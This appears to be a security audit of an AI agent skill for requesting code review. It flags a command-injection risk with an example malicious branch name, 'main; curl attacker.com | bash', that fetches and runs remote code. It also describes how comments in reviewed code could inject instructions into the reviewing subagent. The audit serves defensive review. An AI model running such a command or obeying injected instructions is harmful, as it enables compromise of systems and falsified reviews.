The Agent Skills Directory

[COMMAND_EXECUTION] (LOW): The template in code-reviewer.md uses shell interpolation for {BASE_SHA} and {HEAD_SHA} within git diff commands. While typically safe when derived from local git rev-parse as shown in the examples, an adversary providing a malicious branch name (e.g., main; curl attacker.com | bash) could theoretically trigger command injection if the agent does not validate the input.
[PROMPT_INJECTION] (LOW): The skill is susceptible to Indirect Prompt Injection (Category 8). Evidence: 1. Ingestion points: Untrusted data enters via {WHAT_WAS_IMPLEMENTED}, {PLAN_OR_REQUIREMENTS}, and the output of git diff in code-reviewer.md. 2. Boundary markers: Absent; the template uses standard markdown headers without explicit delimiters or instructions to ignore embedded commands. 3. Capability inventory: The agent can execute shell commands (git) and provide subjective assessments. 4. Sanitization: None; external content is interpolated directly into the subagent prompt. Malicious comments in the reviewed code could attempt to manipulate the review verdict.
[DATA_EXPOSURE] (SAFE): Git history and file access are limited to local repository operations necessary for code review. No exfiltration patterns to non-whitelisted domains were detected.

requesting-code-review